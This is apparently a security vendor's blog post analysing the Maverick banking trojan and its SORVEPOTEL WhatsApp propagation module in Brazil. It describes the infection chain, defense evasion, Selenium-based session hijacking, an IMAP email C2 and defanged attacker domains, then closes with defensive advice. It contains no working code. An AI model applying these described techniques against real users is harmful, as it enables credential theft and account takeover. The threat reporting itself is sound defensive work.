Cybersecurity experts have identified troubling similarities between Maverick, a new strain of malware spreading via WhatsApp, and Coyote, a well-known Brazilian banking trojan. Evidence suggests both are part of the same increasingly sophisticated and hard-to-detect digital threat ecosystem.
According to reports from CyberProof, Trend Micro, and Sophos, both trojans share several key characteristics:
They are developed in .NET.
They primarily target Brazilian users and banks.
They use nearly identical code to monitor URLs and steal credentials.
They can spread via WhatsApp Web, significantly increasing their reach.
In this context, Maverick stands out as a more advanced and dangerous version. It has been attributed to a threat group known as Water Saci and combines credential theft with self-propagation capabilities, effectively operating as a self-sustaining botnet that spreads without user intervention.
The Maverick campaign starts with something seemingly harmless: a ZIP file sent through WhatsApp Web. Inside the archive hides a Windows shortcut file (.LNK) that, when executed, runs a PowerShell command. This command connects the device to the attacker’s server hosted at zapgrande[.]com, triggering the infection chain.
From there, the process unfolds in several stages:
Initial Execution: The .LNK file opens cmd.exe and uses PowerShell to download a malware loader.
Defense Evasion: The malware disables Microsoft Defender and User Account Control (UAC) to operate without restrictions or alerts.
Anti-Analysis: It checks for debugging or reverse engineering tools. If detected, the malware halts execution to avoid analysis.
Payload Delivery: It downloads two main modules:
SORVEPOTEL, responsible for WhatsApp-based propagation.
Maverick, the core banking trojan designed to steal credentials and financial data.
Geofiltering: The malware only activates if it detects the device is in Brazil, verifying language, time zone, and regional settings.
Additionally, according to CyberProof, there are signs that the group behind Maverick (Water Saci) has begun expanding its attacks beyond the banking sector, now targeting hotels and tourism companies in Brazil.
In this campaign, SORVEPOTEL and Maverick operate as a complementary duo: SORVEPOTEL handles malware distribution and propagation, while Maverick does the dirty work—stealing credentials, hijacking browsers, and executing remote commands.
Maverick includes several capabilities specifically designed to target banking users in the region:
Monitors browser tabs for URLs of banks and financial services in Latin America.
Injects or displays fake login pages (phishing) to capture usernames and passwords as victims attempt to access their banks.
Collects system and browser data, such as cookies, tokens, and other session information to facilitate access or fraud.
Executes commands from a remote C2 server, enabling reconnaissance, lateral movement, and persistence on the infected device.
SORVEPOTEL serves as the distribution engine: it handles self-propagation (especially via WhatsApp Web) and prepares the environment for Maverick to install and operate undetected.
Read more: Fake Chrome Extensions Hijack WhatsApp Web to Send Mass Spam
The firms analyzing the campaign have detected a significant shift in tactics by the group attributed as Water Saci. Instead of relying solely on heavy .NET payloads, they are now using more discreet loaders built with Visual Basic Script (VBS) and PowerShell, which offer two clear advantages:
Increased stealth: VBS and PowerShell allow code execution in memory with fewer traces on disk, making it harder for traditional security solutions to detect them.
Greater flexibility: These loaders make it easier to deliver varied payloads and quickly adapt the campaign based on the target or region.
In short, Water Saci has refined its attack chain to be more evasive and modular, using SORVEPOTEL to spread and Maverick to monetize access to bank accounts and user sessions.
New Water Saci Attack Chain (Source: Trend Micro)
This campaign leverages ChromeDriver and Selenium to automate the victim's browser and hijack their WhatsApp Web session. With this access, attackers use the victim's own browser profile (including cookies, tokens, and more) to send malicious ZIP files to all their contacts—without triggering typical security alerts.
The user downloads and extracts a malicious ZIP file.
Inside is a VBS loader (Orcamento.vbs / SORVEPOTEL) that activates a PowerShell script (tadeu.ps1) and executes it in memory.
The script uses Selenium automation with ChromeDriver to take control of the WhatsApp Web session open in the browser.
From the hijacked session, the malware automatically sends malicious ZIP files to the victim’s contact list.
To conceal the activity, it displays a fake banner (“WhatsApp Automation v6.0”), so the victim doesn’t notice any obvious changes.
Additionally, the malware copies the victim’s Chrome profile—including cookies and authentication tokens—to perform a “clean” session hijack without needing QR codes or triggering login alerts.
The result is both powerful and dangerous: attackers gain instant access to WhatsApp accounts and can spread rapidly by using the victims themselves as vectors, all while avoiding common security alarms.
Water Saci Campaign Timeline (Source: Trend Micro)
Read more: Common Types of Cyberattacks on Businesses and How to Prevent Them
One of the most unusual aspects of the Water Saci ecosystem is how it communicates with infected machines. Instead of using traditional command-and-control servers, this group uses an email-based C2 infrastructure, relying on terra.com[.]br accounts protected with multi-factor authentication (MFA).
The malware connects directly to these inboxes via IMAP, from which it downloads commands sent by the attackers. This method makes its activity significantly harder to trace or block.
Some of the most common C2 commands include:
System control: rebooting, shutting down, or updating the machine.
File management: uploading, downloading, deleting, moving, or renaming files.
Remote execution: running CMD or PowerShell commands, taking screenshots, or listing active tasks.
Reconnaissance: gathering system information, searching for files, or listing directories.
Persistence: creating folders, checking email, or maintaining connection with the server.
This approach allows for manual, discreet, and flexible control. Even with MFA protection, operators can manually input codes to maintain undetected access.
With over 148 million active users in Brazil, WhatsApp is the most widely used communication platform for both personal and professional interactions. This makes it an ideal ground for malware campaigns.
Water Saci exploits this high level of trust in three main ways:
Through personal contacts: victims receive files from someone they know, reducing phishing suspicion.
By hijacking legitimate sessions: the malware uses an active WhatsApp Web session to spread, without requiring new logins or QR codes.
Using localized lures: the messages are written in Portuguese and tailored to the local context, increasing their credibility.
According to Trend Micro, this "conversion of trusted social apps into attack tools" marks a major evolution in the tactics of Brazilian cybercriminals—moving from spam emails to direct infections between contacts via messaging platforms.
Several cybersecurity firms (including Kaspersky and Sophos) confirm that Maverick shares code snippets, logical structure, and propagation methods with Coyote, an older banking trojan developed in .NET and also originating from Brazil.
Although there are differing views on whether Maverick is a rebranded version or an evolved variant, all agree that both belong to the same Brazilian threat ecosystem and share a common target: financial institutions.
Both organizations and users in Brazil and Latin America can significantly reduce the risk of infection from Maverick and Water Saci by applying cybersecurity best practices and advanced protection solutions.
At TecnetOne, we recommend implementing the following measures to strengthen your defense against these types of threats:
Block and monitor downloads of ZIP, LNK, VBS, and PowerShell files from unverified sources.
Restrict the use of automation tools like Selenium or ChromeDriver in corporate environments to prevent abuse in compromised browsers.
Adopt endpoint protection solutions with behavior-based detection, such as TecnetProtect, designed to detect and stop malware that runs via scripts or in-memory processes.
Enable multi-factor authentication (MFA) on WhatsApp, email, and other social platforms to prevent unauthorized access.
Train users on social engineering techniques, fake “automation” messages, and the risks of opening files shared via WhatsApp.
Regularly clear browser cookies and sessions to reduce the chance of session hijacking.
Monitor IMAP email traffic for unusual behavior or suspicious authentication attempts that may indicate malicious activity.
At TecnetOne, we offer specialized solutions in advanced threat detection, endpoint protection, and user awareness—designed to help companies prevent attacks like Maverick before they cause damage.